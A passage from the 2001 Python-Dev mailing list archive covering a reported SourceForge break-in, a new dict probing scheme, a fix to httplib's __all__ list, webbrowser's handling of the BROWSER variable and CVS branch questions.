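assert float.fromhex(s) == x     # exact round trip
assert float.fromhex("0x1.8p1") == 3.0

# 0.1 has no exact binary representation; the hex form shows the stored bits.
print((0.1).hex())               # 0x1.999999999999ap-4
```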


From mal at lemburg.com  Thu May 31 09:20:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connected through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, the file's contents are no longer available it seems. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 31 09:33:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid us the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)



From esr at thyrsus.com  Thu May 31 10:43:32 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> In any case, this will avoid us the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume 
a memory density of, say, 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
foreseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.

64-bit clocks counting seconds will turn over in approximately six
trillion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal at lemburg.com  Thu May 31 11:23:52 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal at lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> foreseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.
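A quick check of the storage arithmetic above, using the message's own figures (12e9 people, 100 TB each, decimal prefixes):

```python
import math

people = 12e9            # population figure from the message
per_person = 100e12      # 100 TB per person, in bytes
total = people * per_person

print(f"{total:.2e} bytes")          # 1.20e+24 bytes
print(round(math.log2(total), 1))    # 80.0, i.e. roughly 2^80
```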

Of course, they will want to run Python in order to manage
that data and so will all those Palm users hooking up to the
facility... ;-)



From esr at thyrsus.com  Thu May 31 12:31:07 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> > a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > foreseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure 
volume of the memory ICs, you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64, the diameter of the memory sphere only drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from people's individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas at xs4all.net  Thu May 31 12:45:33 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal at lemburg.com>:

> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the history books as
the guy that said "64 bits ought to be enough for everyone" :-)



From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
"Variable unused" warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious "Base class __init__ not called" warning
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From beazley at cs.uchicago.edu  Thu May 31 15:34:57 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i
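A runnable version of the pattern above, with a hypothetical list and predicate standing in for `r` and `whatever`. It also shows how things eventually settled in Python 3: a for-loop variable still survives the loop, but a list comprehension's variable no longer leaks into the enclosing scope.

```python
def first_negative(values):
    """Return the index of the first negative value, or None."""
    for i, v in enumerate(values):
        if v < 0:
            break
    else:
        return None          # loop finished without a break
    return i                 # loop variable is still bound after break


print(first_negative([3, 1, -4, 1, -5]))  # 2
print(first_negative([1, 2, 3]))          # None

i = "outer"
squares = [i * i for i in range(3)]
print(i)   # outer: in Python 3 the comprehension's i stays inside it
```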

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip at pobox.com  Thu May 31 20:02:51 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)

The workaround I would choose is not to use "from httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.
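A self-contained sketch of the failure and the fix, using a throwaway module object in place of the real `httplib`. The module name `demo_httplib` and its two empty classes are made up for illustration.

```python
import sys
import types

# Hypothetical stand-in for httplib with the 2.1-era, too-short __all__.
mod = types.ModuleType("demo_httplib")
exec(
    "class HTTP: pass\n"
    "class HTTPConnection: pass\n"
    "__all__ = ['HTTP']\n",
    mod.__dict__,
)
sys.modules["demo_httplib"] = mod


def star_import():
    """Run 'from demo_httplib import *' into a fresh namespace."""
    ns = {}
    exec("from demo_httplib import *", ns)
    return ns


before = star_import()
print("HTTPConnection" in before)   # False: not listed in __all__

mod.__all__.append("HTTPConnection")  # the fix: list the public name
after = star_import()
print("HTTPConnection" in after)    # True

# The qualified-import workaround never depends on __all__.
import demo_httplib
print(demo_httplib.HTTPConnection is mod.HTTPConnection)  # True
```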

Before anyone asks, "Who died and made Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the grunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From skip at pobox.com  Thu May 31 20:06:01 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin at jessikat.fsnet.co.uk  Thu May 31 20:33:02 2001
From: robin at jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro
<skip at pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip at pobox.com  Thu May 31 21:27:12 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
	<15126.34635.67975.31473@beluga.mojam.com>
	<s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < $f > $f.tmp
	mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.
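For anyone without sed handy, here is the same textual rename sketched in
Python 3. The function names hide_all and hide_all_in_dir are hypothetical,
and the regular expression is the one from the shell loop: two or more
underscores, then "all", then two underscores.

```python
import re
from pathlib import Path

# Same pattern as the sed one-liner above.
_ALL_RE = re.compile(r"___*all__")


def hide_all(text):
    """Rename every __all__ to ___all__ so "from ... import *" ignores it.

    Like the sed version this is purely textual: it also rewrites __all__
    inside comments and strings, and applying it twice changes nothing more.
    """
    return _ALL_RE.sub("___all__", text)


def hide_all_in_dir(libdir):
    # Top-level *.py files only, mirroring the shell loop (no subdirectories).
    for path in Path(libdir).glob("*.py"):
        path.write_text(hide_all(path.read_text()))
```

Because the pattern also matches names that already have three underscores,
rerunning it over an already-edited tree is harmless.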

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thus far almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught omissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.
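To make the semantics concrete: __all__ is just an ordinary list that the
import machinery reads at import time. If it exists, "from mod import *"
binds exactly the names it lists; if not, it binds every module-level name
that doesn't start with an underscore. The sketch below (Python 3;
star_import_names and demo_mod are made-up names) builds a throwaway module
from source text and reports which names a star import binds.

```python
import sys
import types


def star_import_names(source, modname="demo_mod"):
    """Return the names "from <modname> import *" binds for a module
    whose body is `source`."""
    mod = types.ModuleType(modname)
    exec(source, mod.__dict__)
    sys.modules[modname] = mod  # make the module importable by name
    try:
        namespace = {}
        exec(f"from {modname} import *", namespace)
    finally:
        del sys.modules[modname]
    namespace.pop("__builtins__", None)  # added by exec itself, not the import
    return sorted(namespace)


WITH_ALL = (
    '__all__ = ["HTTP"]\n'
    "class HTTP: pass\n"
    "class HTTPConnection: pass\n"
)
WITHOUT_ALL = (
    "class HTTP: pass\n"
    "class HTTPConnection: pass\n"
    "class _Private: pass\n"
)
print(star_import_names(WITH_ALL))     # ['HTTP']
print(star_import_names(WITHOUT_ALL))  # ['HTTP', 'HTTPConnection']
```

The first case reproduces Robin's NameError: HTTPConnection exists in the
module but is simply not in the list that the star import consults.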

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip at pobox.com  Thu May 31 21:57:21 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'], but 'nautilus'
doesn't appear in _browsers.keys(), which is ['lynx', 'links', 'netscape',
'kfm', 'mozilla'].  I think webbrowser should either ignore elements of BROWSER if
they have not previously been registered (and can't be found by _iscommand)
or try to register them using GenericBrowser.  Users are apparently not the
only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.
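The two options combine naturally: keep BROWSER entries that are already
registered, adopt unknown ones that are runnable commands, and drop the rest.
Here is a minimal sketch of that policy as a pure function. resolve_try_order
is hypothetical and does not touch webbrowser's private _browsers or
_tryorder; splitting BROWSER on os.pathsep is also an assumption. The caller
decides what to do with the names it returns.

```python
import os
import shutil


def resolve_try_order(browser_env, registered, is_command=shutil.which,
                      fallback=()):
    """Return (try_order, to_register) for a BROWSER-style value.

    browser_env -- raw BROWSER value, entries separated by os.pathsep
    registered  -- names the module already knows how to drive
    is_command  -- predicate: is this name an executable on PATH?
    fallback    -- order to use if nothing in BROWSER is usable
    """
    try_order, to_register = [], []
    for name in filter(None, browser_env.split(os.pathsep)):
        if name in registered:
            try_order.append(name)
        elif is_command(name):
            # Unknown but runnable: a candidate for a generic handler.
            to_register.append(name)
            try_order.append(name)
        # Otherwise the entry is neither registered nor on PATH: ignore it.
    if not try_order:
        try_order = list(fallback)  # don't end up with nothing to try
    return try_order, to_register
```

In a current Python, each name in to_register could then be handed to
webbrowser.register(name, None, webbrowser.GenericBrowser(name)).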

Skip


From esr at thyrsus.com  Thu May 31 22:08:21 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip at pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake at acm.org  Thu May 31 22:18:26 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip at pobox.com  Thu May 31 22:30:22 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip at pobox.com  Thu May 31 22:48:40 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake at acm.org  Thu May 31 23:00:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to either Mandrake or Gnome
setting that variable by default -- that's just stupid and inconsiderate
of the user.
  Now, if anyone can provide support for Nautilus, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 31 23:04:30 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
